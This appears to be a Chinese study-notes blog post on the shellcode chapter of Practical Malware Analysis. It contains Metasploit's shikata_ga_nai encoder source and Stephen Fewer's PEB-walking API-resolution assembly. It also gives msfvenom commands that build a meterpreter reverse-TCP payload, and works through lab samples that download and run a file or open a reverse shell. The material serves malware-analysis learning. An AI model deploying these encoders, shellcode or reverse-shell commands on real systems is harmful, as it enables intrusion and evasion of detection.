          'KeySize'    => 4,
          'BlockSize'  => 4
        })
  end

  #
  # Generates the shikata decoder stub.
  #
  def decoder_stub(state)

    # If the decoder stub has not already been generated for this state, do
    # it now.  The decoder stub method may be called more than once.
    if (state.decoder_stub == nil)

      # Sanity check that saved_registers doesn't overlap with modified_registers
      if (modified_registers & saved_registers).length > 0
        raise BadGenerateError
      end

      # Shikata will only cut off the last 1-4 bytes of it's own end
      # depending on the alignment of the original buffer
      cutoff = 4 - (state.buf.length & 3)
      block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)

      # Set the state specific key offset to wherever the XORK ended up.
      state.decoder_key_offset = block.index('XORK')

      # Take the last 1-4 bytes of shikata and prepend them to the buffer
      # that is going to be encoded to make it align on a 4-byte boundary.
      state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf

      # Cache this decoder stub.  The reason we cache the decoder stub is
      # because we need to ensure that the same stub is returned every time
      # for a given encoder state.
      state.decoder_stub = block
    end

    state.decoder_stub
  end

  # Indicate that this module can preserve some registers
  def can_preserve_registers?
    true
  end

  # A list of registers always touched by this encoder
  def modified_registers
    # ESP is assumed and is handled through preserves_stack?
    [
      # The counter register is hardcoded
      Rex::Arch::X86::ECX,
      # These are modified by div and mul operations
      Rex::Arch::X86::EAX, Rex::Arch::X86::EDX
    ]
  end

  # Always blacklist these registers in our block generation
  def block_generator_register_blacklist
    [Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers
  end

protected

  #
  # Returns the set of FPU instructions that can be used for the FPU block of
  # the decoder stub.
  #
  def fpu_instructions
    fpus = []

    0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
    0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }

    fpus << "\xd9\xd0"
    fpus << "\xd9\xe1"
    fpus << "\xd9\xf6"
    fpus << "\xd9\xf7"
    fpus << "\xd9\xe5"

    # This FPU instruction seems to fail consistently on Linux
    #fpus << "\xdb\xe1"

    fpus
  end

  #
  # Returns a polymorphic decoder stub that is capable of decoding a buffer
  # of the supplied length and encodes the last cutoff bytes of itself.
  #
  def generate_shikata_block(state, length, cutoff)
    # Declare logical registers
    count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
    addr_reg  = Rex::Poly::LogicalRegister::X86.new('addr')
    key_reg = nil

    if state.context_encoding
      key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
    else
      key_reg = Rex::Poly::LogicalRegister::X86.new('key')
    end

    # Declare individual blocks
    endb = Rex::Poly::SymbolicBlock::End.new

    # Clear the counter register
    clear_register = Rex::Poly::LogicalBlock.new('clear_register',
      "\x31\xc9",  # xor ecx,ecx
      "\x29\xc9",  # sub ecx,ecx
      "\x33\xc9",  # xor ecx,ecx
      "\x2b\xc9")  # sub ecx,ecx

    # Initialize the counter after zeroing it
    init_counter = Rex::Poly::LogicalBlock.new('init_counter')

    # Divide the length by four but ensure that it aligns on a block size
    # boundary (4 byte).
    length += 4 + (4 - (length & 3)) & 3
    length /= 4

    if (length <= 255)
      init_counter.add_perm("\xb1" + [ length ].pack('C'))
    elsif (length <= 65536)
      init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
    else
      init_counter.add_perm("\xb9" + [ length ].pack('V'))
    end

    # Key initialization block
    init_key = nil

    # If using context encoding, we use a mov reg, [addr]
    if state.context_encoding
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK'})
    # Otherwise, we do a direct mov reg, val
    else
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK'})
    end

    xor  = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
    add  = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }

    sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
    add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }

    if (datastore["BufferRegister"])

      buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])
      offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)
      if ((offset < -255 or offset > 255) and state.badchars.include? "\x00")
        raise EncodingError.new("Can't generate NULL-free decoder with a BufferOffset bigger than one byte")
      end
      mov = Proc.new { |b|
        # mov <buff_reg>, <addr_reg>
        "\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
      }
      add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }
      sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }

      getpc = Rex::Poly::LogicalBlock.new('getpc')
      getpc.add_perm(Proc.new{ |b| mov.call(b) + add_offset.call(b) })
      getpc.add_perm(Proc.new{ |b| mov.call(b) + sub_offset.call(b) })

      # With an offset of less than four, inc is smaller than or the same size as add
      if (offset > 0 and offset < 4)
        getpc.add_perm(Proc.new{ |b| mov.call(b) + inc(b.regnum_of(addr_reg))*offset })
      elsif (offset < 0 and offset > -4)
        getpc.add_perm(Proc.new{ |b| mov.call(b) + dec(b.regnum_of(addr_reg))*(-offset) })
      end

      # NOTE: Adding a perm with possibly different sizes is normally
      # wrong since it will change the SymbolicBlock::End offset during
      # various stages of generation.  In this case, though, offset is
      # constant throughout the whole process, so it isn't a problem.
      getpc.add_perm(Proc.new{ |b|
        if (offset < -255 or offset > 255)
          # lea addr_reg, [buff_reg + DWORD offset]
          # NOTE: This will generate NULL bytes!
          "\x8d" + (0x80 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('V')
        elsif (offset > -255 and offset != 0 and offset < 255)
          # lea addr_reg, [buff_reg + byte offset]
          "\x8d" + (0x40 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('c')
        else
          # lea addr_reg, [buff_reg]
          "\x8d" + (b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr
        end
      })

      # BufferReg+BufferOffset points right at the beginning of our
      # buffer, so in contrast to the fnstenv technique, we don't have to
      # sub off any other offsets.
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }

    else
      # FPU blocks
      fpu = Rex::Poly::LogicalBlock.new('fpu',
        *fpu_instructions)

      fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
        "\xd9\x74\x24\xf4")
      fnstenv.depends_on(fpu)

      # Get EIP off the stack
      getpc = Rex::Poly::LogicalBlock.new('getpc',
        Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
      getpc.depends_on(fnstenv)

      # Subtract the offset of the fpu instruction since that's where eip points after fnstenv
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
    end

    # Decoder loop block
    loop_block = Rex::Poly::LogicalBlock.new('loop_block')

    loop_block.add_perm(
      Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
      Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
      Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
      Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
      Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
      Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })

    # Loop instruction block
    loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
      "\xe2\xf5")
      # In the current implementation the loop block is a constant size,
      # so really no need for a fancy calculation.  Nevertheless, here's
      # one way to do it:
      #Proc.new { |b|
      # # loop <loop_block label>
      # # -2 to account for the size of this instruction
      # "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
      #})

    # Define block dependencies
    clear_register.depends_on(getpc)
    init_counter.depends_on(clear_register)
    loop_block.depends_on(init_counter, init_key)
    loop_inst.depends_on(loop_block)

    begin
      # Generate a permutation saving the ECX, ESP, and user defined registers
      loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
    rescue RuntimeError, EncodingError => e
      # The Rex::Poly block generator can raise RuntimeError variants
      raise EncodingError, e.to_s
    end
  end

  # Convert the SaveRegisters to an array of x86 register constants
  def saved_registers
    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
  end

  def sub_immediate(regnum, imm)
    return "" if imm.nil? or imm == 0
    if imm > 255 or imm < -255
      "\x81" + (0xe8 + regnum).chr + [imm].pack('V')
    else
      "\x83" + (0xe8 + regnum).chr + [imm].pack('c')
    end
  end
  def add_immediate(regnum, imm)
    return "" if imm.nil? or imm == 0
    if imm > 255 or imm < -255
      "\x81" + (0xc0 + regnum).chr + [imm].pack('V')
    else
      "\x83" + (0xc0 + regnum).chr + [imm].pack('c')
    end
  end
  def inc(regnum)
    [0x40 + regnum].pack('C')
  end
  def dec(regnum)
    [0x48 + regnum].pack('C')
  end
end

fpu4.png

可以生成shellcode进行调试

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.128 LPORT=8888 -e x86/shikata_ga_nai -f raw -o re_shell_shikata2.bin

手动符号解析

shellcode经常使用LoadLibraryA和GetProcAddress函数来动态定位和加载函数，LoadLibraryA加载指定的库，并返回一个句柄。GetProcAddress函数在库的导出表中查找给定的符号名或序号。如果shellcode有这两个函数的访问权限，它可以加载任何库到系统中并找到导出符号，这时它就可以完整地访问API了。

两个函数都是从kernel32.dll中导出的，所以shellcode必须做如下事情:

在内存中找到kernel32.dll.
解析kernel32.dll的PE文件，并搜索导出函数LoadLibraryA和GetProcAddress。

参考资料

1、重要结构体神图

shen.jpg

2、VergiliusProject结构体查询网站 https://www.vergiliusproject.com/kernels

3、微软未公开数据 http://undocumented.ntinternals.net/

在内存中找到kernel32.dll

要找到kernel32.dll的基地址，我们需要跟踪图19-1所示的一些数据结构(在每一个结构体中只显示了相关域与偏移值。

teb1.png

进程从TEB结构体开始,其地址可以从FS段寄存器中访问到。TEB中偏移0x30是指向PEB的指针。PEB中偏移0xc是指向PEB_LDR_DATA结构体的指针，它是包含三个链接LDR_DATA_TABLE结构的双向链表——每个被加载的模块都有一个。在kernel32.dll项中的DllBase域就是我们正在查找的值。

peb2.jpg

可以看到这是一个以PEB_LDR_DATA为起点的一个闭合环形双向链表。

每个_LDR_DATA_TABLE_ENTRY节点结构中偏移为0x30处的成员为dllName，偏移为0x18处的成员为DllBase

通过遍历链表，比较dllName字符串内容可以找到目标模块的所属节点。

通过节点成员DllBase可以定位该模块的DOS头起始处。通过对PE结构的解析可以搜索导出表，从而可以取到指定的导出函数地址。

findkernel32base.png

metasploit中也利用了相似手法。

Link：https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x86/src/block/block_api.asm

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: NT4 and newer
; Architecture: x86
; Size: 140 bytes
;-----------------------------------------------------------------------------;

[BITS 32]

; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.

api_call:
  pushad                     ; We preserve all the registers for the caller, bar EAX and ECX.
  mov ebp, esp               ; Create a new stack frame
  xor edx, edx               ; Zero EDX
  mov edx, [fs:edx+0x30]     ; Get a pointer to the PEB
  mov edx, [edx+0xc]         ; Get PEB->Ldr
  mov edx, [edx+0x14]        ; Get the first module from the InMemoryOrder module list
next_mod:                    ;
  mov esi, [edx+0x28]        ; Get pointer to modules name (unicode string)
  movzx ecx, word [edx+0x26] ; Set ECX to the length we want to check
  xor edi, edi               ; Clear EDI which will store the hash of the module name
loop_modname:                ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the name
  cmp al, 'a'                ; Some versions of Windows use lower case module names
  jl not_lowercase           ;
  sub al, 0x20               ; If so normalise to uppercase
not_lowercase:               ;
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  dec ecx
  jnz loop_modname           ; Loop until we have read enough
  ; We now have the module hash computed
  push edx                   ; Save the current position in the module list for later
  push edi                   ; Save the current module hash for later
  ; Proceed to iterate the export address table,
  mov edx, [edx+0x10]        ; Get this modules base address
  mov eax, [edx+0x3c]        ; Get PE header
  add eax, edx               ; Add the modules base address
  mov eax, [eax+0x78]        ; Get export tables RVA
  test eax, eax              ; Test if no export address table is present
  jz get_next_mod1           ; If no EAT present, process the next module
  add eax, edx               ; Add the modules base address
  push eax                   ; Save the current modules EAT
  mov ecx, [eax+0x18]        ; Get the number of function names
  mov ebx, [eax+0x20]        ; Get the rva of the function names
  add ebx, edx               ; Add the modules base address
  ; Computing the module hash + function hash
get_next_func:               ;
  test ecx, ecx              ; Changed from jecxz to accomodate the larger offset produced by random jmps below
  jz get_next_mod            ; When we reach the start of the EAT (we search backwards), process the next module
  dec ecx                    ; Decrement the function name counter
  mov esi, [ebx+ecx*4]       ; Get rva of next module name
  add esi, edx               ; Add the modules base address
  xor edi, edi               ; Clear EDI which will store the hash of the function name
  ; And compare it to the one we want
loop_funcname:               ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the ASCII function name
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  cmp al, ah                 ; Compare AL (the next byte from the name) to AH (null)
  jne loop_funcname          ; If we have not reached the null terminator, continue
  add edi, [ebp-8]           ; Add the current module hash to the function hash
  cmp edi, [ebp+0x24]        ; Compare the hash to the one we are searchnig for
  jnz get_next_func          ; Go compute the next function hash if we have not found it
  ; If found, fix up stack, call the function and then value else compute the next one...
  pop eax                    ; Restore the current modules EAT
  mov ebx, [eax+0x24]        ; Get the ordinal table rva
  add ebx, edx               ; Add the modules base address
  mov cx, [ebx+2*ecx]        ; Get the desired functions ordinal
  mov ebx, [eax+0x1c]        ; Get the function addresses table rva
  add ebx, edx               ; Add the modules base address
  mov eax, [ebx+4*ecx]       ; Get the desired functions RVA
  add eax, edx               ; Add the modules base address to get the functions actual VA
  ; We now fix up the stack and perform the call to the desired function...
finish:
  mov [esp+0x24], eax        ; Overwrite the old EAX value with the desired api address for the upcoming popad
  pop ebx                    ; Clear off the current modules hash
  pop ebx                    ; Clear off the current position in the module list
  popad                      ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
  pop ecx                    ; Pop off the origional return address our caller will have pushed
  pop edx                    ; Pop off the hash value our caller will have pushed
  push ecx                   ; Push back the correct return value
  jmp eax                    ; Jump into the required function
  ; We now automagically return to the correct caller...
get_next_mod:                ;
  pop eax                    ; Pop off the current (now the previous) modules EAT
get_next_mod1:               ;
  pop edi                    ; Pop off the current (now the previous) modules hash
  pop edx                    ; Restore our position in the module list
  mov edx, [edx]             ; Get the next module
  jmp next_mod               ; Process this module
Footer

可以使用msfvenom生成shellcode查看真实病毒中shellcode实现

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.128 LPORT=8888 -f raw -o re_shell.bin

rs_sc.png

使用散列过的导出符号名

如何找到我们想要的指定函数呢？我们可以解决这个问题的方法是计算出每个符号字符串的散列值，并用这个结果与保存在shellcode中的预先计算的值进行比较。散列函数不需要很复杂;只需要保证在每个被shellcode使用的DLL中，这些散列值是独一无二的就可以了。在不同DLL的符号之间及shellcode不使用的符号之间的散列冲突是可以接受的。

最常用的散列函数是32位旋转向右累加散。

hashstring.png

同样贴出此手法在metasploit中实现

Link：https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x86/src/block/block_api.asm

ror.png

Shellcode编码

真实环境中如果要利用shellcode必然要对shellcode进行一定的编码处理。例如，如果一个程序正在对输入数据执行一些基本的过滤，那么这个shellocde必须绕过这个过滤。这意味着shellcode通常必须看起来像是合法数据，这样才能被一个脆弱程序所接受。

如果一个程序使用了strcpy和strcat，而我们想要利用程序漏洞读取或者复制恶意负载到指定的缓冲区时，我们的shellcode中就不能有NULL（0x00）这样会导致我们的数据被截断。

而且程序可能对shellcode必须传递给它的数据执行额外的正确性检查：

所有字节都是可打印的（小于0x80）ASCII字节。
所有字节都是字母数字组合的（A到Z，a到z，或0到9）。

下面是常用的编码技术:

用常量字节掩码来XOR所有载荷字节。记住对所有拥有同样大小的值a、b，都有(a XOR b)XOR b == a。
使用一种字母变换，有效载荷的每个字节被分割成两个4比特，然后与一个可打印的ASCII字符(比如A或a）相加。

shellcode编码对攻击者来说有额外的好处，主要体现在他们可以通过隐藏诸如URL或IP地址之类的人类可读的字符串，使分析更困难。（我们使用简单的strings命令就可以得到恶意样本的可读字符串）此外，编码还可以帮助shellcode躲避网络入侵检测系统。

可以使用msfvenom的编码器来进行编码，很多编码器都是使用xor加密

┌──(root💀kali)-[/home/kali]
└─# msfvenom -l encoder             

Framework Encoders [--encoder <value>]
======================================

    Name                       Rank       Description
    ----                       ----       -----------
    cmd/brace                  low        Bash Brace Expansion Command Encoder
    cmd/echo                   good       Echo Command Encoder
    cmd/generic_sh             manual     Generic Shell Variable Substitution Command
                                           Encoder
    cmd/ifs                    low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                   normal     Perl Command Encoder
    cmd/powershell_base64      excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq          manual     printf(1) via PHP magic_quotes Utility Comm
                                          and Encoder
    generic/eicar              manual     The EICAR Encoder
    generic/none               normal     The "none" Encoder
    mipsbe/byte_xori           normal     Byte XORi Encoder
    mipsbe/longxor             normal     XOR Encoder
    mipsle/byte_xori           normal     Byte XORi Encoder
    mipsle/longxor             normal     XOR Encoder
    php/base64                 great      PHP Base64 Encoder
    ppc/longxor                normal     PPC LongXOR Encoder
    ppc/longxor_tag            normal     PPC LongXOR Encoder
    ruby/base64                great      Ruby Base64 Encoder
    sparc/longxor_tag          normal     SPARC DWORD XOR Encoder
    x64/xor                    normal     XOR Encoder
    x64/xor_context            normal     Hostname-based Context Keyed Payload Encode
                                          r
    x64/xor_dynamic            normal     Dynamic key XOR Encoder
    x64/zutto_dekiru           manual     Zutto Dekiru
    x86/add_sub                manual     Add/Sub Encoder
    x86/alpha_mixed            low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper            low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolo  manual     Avoid underscore/tolower
    wer
    x86/avoid_utf8_tolower     manual     Avoid UTF8/tolower
    x86/bloxor                 manual     BloXor - A Metamorphic Block Based XOR Enco
                                          der
    x86/bmp_polyglot           manual     BMP Polyglot
    x86/call4_dword_xor        normal     Call+4 Dword XOR Encoder
    x86/context_cpuid          manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat           manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time           manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown              normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov            normal     Variable-length Fnstenv/mov Dword XOR Encod
                                          er
    x86/jmp_call_additive      normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha               low        Non-Alpha Encoder
    x86/nonupper               low        Non-Upper Encoder
    x86/opt_sub                manual     Sub Encoder (optimised)
    x86/service                manual     Register Service
    x86/shikata_ga_nai         excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit      manual     Single Static Bit
    x86/unicode_mixed          manual     Alpha2 Alphanumeric Unicode Mixedcase Encod
                                          er
    x86/unicode_upper          manual     Alpha2 Alphanumeric Unicode Uppercase Encod
                                          er
    x86/xor_dynamic            normal     Dynamic key XOR Encoder

空指令雪橇

一个空指令雪橇(NOP sled)(也被称为空指令滑行区)是在shellcode之前的一段很长的指令序列，如图19-3所示。空指令雪橇并不是shellcode所必需的，但是它们经常被包含到一次漏洞利用中，以增加这个漏洞利用成功的可能性。shellcode编写者往往可以通过在shellcode后创建一大段空指令雪橇实现这一点。只要代码执行到这个空指令雪橇中的某处，shellcode最终都会运行。

sled.png

传统的空指令雪橇由一长段NOP (0x90）指令序列组成，但是漏洞利用的编写者会用很多创新来避免检测。其他常用的空指令操作码在0x40至0x4f范围内。这些操作码是单字节指令，用于对通用寄存器的递增或递减。这个操作码字节范围也包含了可打印ASCII字符。这通常是有用的，因为空指令雪橇在解码器运行之前执行，所以它必须与shellcode的其余部分一样通过过滤。

找到shellcode

在Javascript中

JavaScript中常使用unescape函数经常被用来将编码过的shellcode转换为可执行的二进制代码

unescape的编码方式会将文本%uXXYY视作一个编码后大端Unicode字符，这里的XX和YY是十六进制值。在小端的机器（比如x86)上，字节序YY XX是被解码后的结果。例如，考虑如下文本字符串:

unes.png

一个后面没有紧跟字母u的%符号，会被作为一个单独编码后的十六进制字节对待。例如，文本字符串%41%42%43%44会被解码为二进制字节序列41 4243 44。

提示:单字节与双字节字符编码可以被同时用在同一个文本字符串中。这在使用JavaScript语言的地方（包括PDF文档中）是非常普遍的编码混淆技术。

在进程注入中

在分析进程注入类恶意代码时，如果恶意代码启动一个远程线程，但是没有英语重定位修正或解除外部依赖，那么被写入其他进程的缓冲区的数据很可能是一段shellcode。

Tips:进程注入关键函数如下

VirtualAllocEx
WriteProcessMemory
CreateRemoteThread

重要的操作码

有时候寻找shellcode可能不会很顺利，但是可以定位到shellcode之前的解码器，可以搜素以下的重要操作码

imp_opcode.png

实验部分

Lab 19-1

使用shellcode_launcher.exe，分析文件Lab19-01.bin。

1、这段shellcode是如何编码的?
2、这段shellcode手动导入了哪个函数?
3、这段shellcode和哪个网络主机通信?
4、这段shellcode在文件系统上留下了什么迹象?
5、这段shellcode做了什么?

使用scdbg来运行shellcode

scdbg.exe -r -f C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin

scdbg.png

手动导入了六个函数

LoadLibraryA()
GetSystemDirectoryA()
URLDownloadToFile()
GetCurrentProcess()
TerminateProcess()

shellcode下载http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe,并保存在c:\WINDOWS\system32\1.exe，继而执行该文件

可以使用软件加载shellcode进行分析

jmp2it:https://github.com/adamkramer/jmp2it

This will allow you to transfer EIP control to a specified offset within a file containing shellcode and then pause to support a malware analysis investigation

The file will be mapped to memory and maintain a handle, allowing shellcode to egghunt for second stage payload as would have happened in original loader

Patches / self modifications are dynamically written to jmp2it-flypaper.out

Usage: jmp2it.exe [file containing shellcode] [file offset to transfer EIP to]

Example: jmp2it.exe malware.doc 0x15C

Explaination: The file will be mapped and code at 0x15C will immediately run

Example: jmp2it.exe malware.doc 0x15C pause

Explaination: As above, with JMP SHORT 0xFE inserted pre-offset causing loop

Example: jmp2it.exe malware.doc 0x15C addhandle another.doc pause

Explaination: As above, but will create additional handle to specified file

Optional extras (to be added after first two parameters):

addhandle [path to file] - Create an arbatory handle to a specified file

Only one of the following two may be used:

pause - Inserts JMP SHORT 0xFE just before offset causing infinite loop

pause_int3 - Inserts INT3 just before offset [launch via debugger!]

Note: In these cases, you will be presented with step by step instructions on what you need to do inside a debugger to resume the analysis

jmp2it.exe C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin 0x0 pause

在解码完成后就进入解码后的攻击payload，在0x224偏移处

0x224.png

在0x2bf位置使用call/pop将url地址放在ebx寄存器

ebx.png

可以看到0x29E处函数通过PEB找对应目标函数。

findkernel32.png

更详细的手工分析不再进行，可以使用scdbg将运行时内存dump下来，分析更方便

scdbg.exe /f C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin -r -d

可以看到自动分析出了自编码技术，并且dump成功。

11111.png

Lab 19-2

文件Lab19-02.exe包含一段shellcode，这段shellcode会被注入到另外一个进程并运行，请分析这个文件。

1、这段shellcode被注入到什么进程中?
2、这段shellcode位于哪里?
3、这段shellcode是如何被编码的?
4、这段shellcode手动导入了哪个函数?
5、这段shellcode和什么网络主机进行通信?
6、这段shellcode做了什么?

直接运行Lab19-02.exe发现打印了进程信息，并且打开了浏览器。

19-02.png

操作了注册表，该注册表值是默认的浏览器

hkcr.png

ie.png

Ida中分析此恶意文件为进程注入，shellcode在0x407030，shellcode经过了编码，可以在X32dbg中打开，F9后，将EIP改为shellcode入口点0x403070，

eippp.png

3b到3e这三行循环解码

encode.png

使用脚本dump出解密后的shellcode

import idc

def main():
    begin = 0x407048;
    size = 0x18f
    list = []
    for i in range(size):
        byte_tmp = idc.Byte(begin + i)
        list.append(byte_tmp ^ 0xe7)
        if (i + 1) % 0x1000 == 0:
            print("All count:{}, collect current:{}, has finish {}".format(hex(size), hex(i + 1), float(i + 1) / size))
    print('collect over')
    file = "lab19-02.bin"
    buf = bytearray(list)
    with open(file, 'wb') as fw:
        fw.write(buf)
    print('write over')

if __name__=='__main__':
    main()

分析发现是一个反弹shell，host和端口如下，原始图片忘记截图了，可以将host改成自己的ip，监听13330端口，等待反弹shell回连。

rv_shell.png

huilian.png

Lab 19-3

分析文件Lab19-03.pdf。如果你被卡住了，并且无法找到这段shellcode，那就跳过这个实验的前半部分，使用shellcode_launcher.exe工具分析文件Lab19-03_sc.bin.

1、这个PDF中使用了什么漏洞?
2、这段shellcode是如何编码的?
3、这段shellcode手动导入了哪个函数?
4、这段shellcode在文件系统上留下了什么迹象?
5、这段shellcode做了什么?

恶意代码分析实战第十九章 shellcode
shellcode是指一个原始可执行代码的有效载荷。shellcode这个名字来源于攻击者通常会使用这段代码来获得...
C++写一个简单的反弹Shell程序
前言最近学习《恶意代码分析实战》第九章，Lab09-02.exe这个文件比较有意思，核心程序是一个反向shell...
[Linux_x86栈溢出攻击] 如何优化shellcode(读
简介 : 分析 : shellcode : 机器码 : shellcode : 执行结果 : 优化shellcod...
恶意代码分析实战第零章恶意代码分析实战实验文件下载
前言简单记录下恶意代码分析实战这本书配套文件的下载。下载地址 https://github.com/mikes...
逆向入门分析实战（三）
之前两篇文章，针对恶意代码为了确保自身只有一个实例在运行进行了正向开发和逆向分析。逆向入门分析实战（一）、逆向分析...
vmware 恶意代码分析虚拟机网络环境配置 Apate、Ine
前言学习恶意代码分析的第一步就是配置网络环境，网络环境配置好以后才能放心的运行恶意代码进行分析。分析恶意代码首...
pwnable.tw wp
start 分析: ret2shellcode 流程:传入shellcode 并且执行要点: 1.得到溢出,劫持...
恶意代码分析实战第九章 OllyDbg
OllyDbg被普遍用来分析恶意代码之前,最初的用途是破解软件。 Immunity Security公司买下 Ol...
恶意代码分析实战第十一章恶意代码的行为
本章主要熟悉恶意代码的行为。下载器和启动器常见的两种恶意代码是下载器和启动器。下载器从互联网上下载其他的恶意代...
第0章恶意代码分析入门
0.1 恶意代码分析目标恶意代码分析的目标一般是为一起网络入侵事件的相应提供所需信息。恶意代码分析可以用来编...